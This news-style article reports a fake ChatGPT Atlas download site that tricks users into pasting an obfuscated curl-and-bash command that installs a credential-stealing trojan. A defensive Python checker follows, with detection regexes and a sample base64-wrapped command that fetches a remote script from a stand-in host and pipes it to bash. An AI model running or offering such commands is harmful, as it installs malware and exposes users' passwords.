A new scam is making the rounds online, and this time it’s masquerading as the ChatGPT Atlas browser. Security researchers are warning users to be careful after spotting a convincing fake version promoted through search ads—one that looks legitimate at first glance but is designed to steal your account data.

The warning comes from research firm Fable. The fake browser isn’t using any sophisticated exploits. Instead, it relies on tricking people who assume anything that looks polished and appears at the top of search results must be safe.
The setup is simple. A search ad appears promising a download of “ChatGPT Atlas,” complete with branding that matches the real thing. Clicking on the link takes you to a website that looks nearly identical to the official one. The layout, the wording, even the design cues are copied almost perfectly. But there’s one major giveaway: the site is actually hosted on Google Sites. According to Fable, scammers often clone legitimate pages using tools like v0.dev, then deploy them on Google’s hosting platform to give the illusion of trustworthiness—especially for users who associate “Google” with safety.

Things get shady the moment you try to download the app. Instead of offering a normal installer file, the site tells users to paste a command into their terminal. Anyone even slightly tech-savvy would recognize this as a massive red flag. But for people who aren’t familiar with the terminal, it might look like a harmless setup step.
The command itself is obfuscated as a base64-encoded string, which is decoded and then executed through curl and bash. Once it runs, the malware pops up a request asking for your administrator password. If the user enters it, the trojan gains full sudo privileges and immediately installs a second-stage payload. From that point on, the attacker can scrape stored browser passwords, account logins, and other sensitive data.
This tactic is essentially a twist on the known “ClickFix” attack method. Nothing here is technically advanced—it’s almost shockingly simple. But it works because it leans heavily on social engineering: people trust familiar brands, trust search ads, and trust anything that looks clean and official. And that’s exactly what the attackers are banking on.
The takeaway is clear: if a website ever tells you to paste a terminal command to install something, stop right there. Always double-check the domain, and only download apps from verified sources.
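
One way to screen a command before it is pasted, for the base64-plus-curl-and-bash pattern described above. This is an added example, not code from Fable or the original article; the regexes, the 24-character threshold, and the sample strings are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Heuristics below are assumptions for illustration, not a complete detector.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")   # long base64-looking run
DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
FETCH = re.compile(r"\b(curl|wget)\b")
SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b|\b(ba|z)?sh\s+-c\b")
SUDO = re.compile(r"\bsudo\b")


def decoded_layers(text):
    """Return readable strings recovered from base64 runs inside text."""
    layers = []
    for match in B64_RUN.finditer(text):
        blob = match.group(0)
        blob += "=" * (-len(blob) % 4)          # restore stripped padding
        try:
            plain = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue                             # not base64 text, ignore
        if all(c.isprintable() or c.isspace() for c in plain):
            layers.append(plain)
    return layers


def assess(command):
    """List the reasons a pasted command matches the paste-and-run pattern."""
    layers = decoded_layers(command)
    views = [command] + layers                   # visible text plus hidden text
    reasons = []
    if layers and DECODE.search(command):
        reasons.append("base64-encoded command")
    if any(FETCH.search(v) for v in views) and any(SHELL.search(v) for v in views):
        reasons.append("remote content piped to a shell")
    if any(SUDO.search(v) for v in views):
        reasons.append("asks for administrator rights")
    return reasons


# Constructed samples: the hidden command points at a reserved .invalid name.
HIDDEN = "curl -fsSL https://example.invalid/install.sh | bash"
SAMPLE_PASTED = 'echo "%s" | base64 -d | bash' % base64.b64encode(HIDDEN.encode()).decode()
SAMPLE_BENIGN = "python3 -m pip install --user requests"

if __name__ == "__main__":
    for cmd in (SAMPLE_PASTED, SAMPLE_BENIGN):
        print(assess(cmd) or ["no match"], "<-", cmd[:60])
```

An empty result does not mean a command is safe; the check only surfaces what the encoding hides so it can be read before anything runs.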